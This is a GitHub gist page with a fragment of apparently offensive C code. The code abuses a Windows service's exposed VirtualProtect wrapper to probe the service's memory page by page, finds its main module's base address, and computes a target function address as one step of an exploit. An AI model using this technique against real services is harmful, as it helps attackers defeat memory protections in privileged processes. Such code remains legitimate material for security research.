Instantly share code, notes, and snippets.

Embed
What would you like to do?
pid = /*Locate the service's pid with the help of NtQuerySystemInformation*/;
for( Page = 0x1000; Page < 0x7fffffff; Page += 0x1000 )
{
Page_cp = Page;
OldProtection = CommunicateServiceVirtualProtect(
pid, //We give the service its own pid
Page, //Address of the page in the service's process
PAGE_EXECUTE_READWRITE, //Change to the most permissible protection to avoid crashes
0x1000
);
if ( OldProtection == -1 ) //Invalid page
continue;
if ( OldProtection == PAGE_EXECUTE_READ )
{
//this is the main module's .text section
Base = Page - 0x1000;
Page = 0x7fffefff; //to break after restoring the old protection
}
//restore the old protection
CommunicateServiceVirtualProtect(
pid,
Page_cp,
OldProtection,
0x1000
);
}
//Use the base to calculate the function address
pFunc = Base + FuncOffset;
//....
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment